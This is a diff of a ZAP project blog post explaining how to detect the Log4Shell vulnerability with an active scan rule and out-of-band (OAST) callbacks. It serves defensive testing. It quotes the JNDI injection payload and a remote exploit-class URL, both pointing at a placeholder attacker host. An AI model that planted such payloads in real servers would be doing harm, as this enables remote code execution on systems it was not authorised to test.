zaproxy/zaproxy-website/site/content/blog/2021-12-14-log4shell-detection-with-zap/index.md

 - akshath
 ---

-Our last blog post talked about how ZAP 2.11.0 was vulnerable to Log4Shell and our efforts to patch it.
+Our [last blog post](/blog/2021-12-10-zap-and-log4shell/) talked about how ZAP 2.11.0 was potentially vulnerable to Log4Shell and how we fixed that.
 In this blog post we are going to look at detecting Log4Shell with the ZAP Automation Framework and the OAST add-on.

+## The New ZAP Log4Shell Active Scan Rule

-We recently added a new scan rule to detect Log4Shell in the alpha active scanner rules add-on.
+We recently added a new scan rule to detect Log4Shell in the [alpha active scanner rules](/docs/desktop/addons/active-scan-rules-alpha/) add-on.
 To use it, you will need to:
-1. Install the Active scanner rules (alpha) add-on from the [ZAP Marketplace](https://www.zaproxy.org/addons/).
+1. Install the Active scanner rules (alpha) add-on from the [ZAP Marketplace](/addons/).
-2. [Enable an OAST service](https://www.zaproxy.org/docs/desktop/addons/oast-support/options/#active-scan-service) that will be used in Active Scan Rules (explained why below).
+2. [Enable an OAST service](/docs/desktop/addons/oast-support/options/#active-scan-service) that will be used in Active Scan Rules (explained why below).
 3. Launch an Active Scan against the application you want to test.
-You can do this from the GUI, but in this post we will be using the ZAP automation framework and do everything from the CLI.
+You can do this from the GUI, but in this post we will be using the ZAP [Automation Framework](/docs/desktop/addons/automation-framework/) and do everything from the CLI.

+By default ZAP does not actively scan HTTP headers as this can significantly increase the scan time.
+However this vulnerability is often exposed via headers so we recommend scanning them in this case.
+Instead of turning them on for all scan rules you can just perform a scan using this scan rule, which is what we demonstrate below.

+## Out of Band Testing

 To understand why we need out-of-band testing to detect Log4Shell, we must first understand how the attack works at a high level.

 As explained at https://log4shell.com,
 1. Data taken from the user is sent to the server (via any protocol).
-1. The server logs the request data, which includes the malicious payload: `${jndi:ldap://attacker.com/abc}` (where `attacker.com` is an attacker controlled server).
+1. The server logs the request data, which includes the malicious payload: `${jndi:ldap://attacker.example.com/abc}` (where `attacker.example.com` is an attacker controlled server).
-1. This payload triggers the log4j vulnerability, and the server sends a request to attacker.com via the "Java Naming and Directory Interface" (JNDI) protocol.
+1. This payload triggers the log4j vulnerability, and the server sends a request to attacker.example.com via the "Java Naming and Directory Interface" (JNDI) protocol.
-1. The response from the attacker controlled server includes a URL to a remote Java class file (for example, `http://second-stage.attacker.com/Exploit.class`) that is injected into the server process.
+1. The response from the attacker controlled server includes a URL to a remote Java class file (for example, `http://second-stage.attacker.example.com/Exploit.class`) that is injected into the server process.
 1. The second stage is triggered by the injected payload, which allows an attacker to run arbitrary code.

 Note the third point above.

-> The server sends a request to attacker.com
+> The server sends a request to attacker.example.com

+## The OAST Add-on

 We need a way to verify that this request was made.
 This is where OAST comes in.
-Here's how a typical active scan rule that makes use of the [OAST add-on for ZAP](https://www.zaproxy.org/docs/desktop/addons/oast-support/) proceeds:
+Here's how a typical active scan rule that makes use of the [OAST add-on for ZAP](/docs/desktop/addons/oast-support/) proceeds:

 1. Obtain a unique domain from the OAST add-on.
-2. Insert the domain into a known Log4Shell payload, like `${jndi:ldap://attacker.com/abc}` above.
+2. Insert the domain into a known Log4Shell payload, like `${jndi:ldap://attacker.example.com/abc}` above.
 3. Poll the selected OAST service to check for DNS interactions at the domain.
+4. An alert is raised if any interactions were made to the OAST service.

 ZAP currently supports two third-party open source OAST services - [BOAST](https://github.com/marcoagner/boast) and [Interactsh](https://github.com/projectdiscovery/interactsh).
-It also supports a [Callbacks](https://www.zaproxy.org/docs/desktop/addons/oast-support/services/callbacks/) service which is hosted on the same server as ZAP.
+It also supports a [Callbacks](/docs/desktop/addons/oast-support/services/callbacks/) service which is hosted on the same server as ZAP.
 By default, ZAP uses the free, publicly hosted instances of BOAST or Interactsh but you can also host them on your own and configure them in ZAP.

-4. An alert is raised if any interactions were made to the OAST service.
+## A Walkthrough Example

 Let’s look at the scan rule in action against a deliberately vulnerable app.
 Feel free to follow along.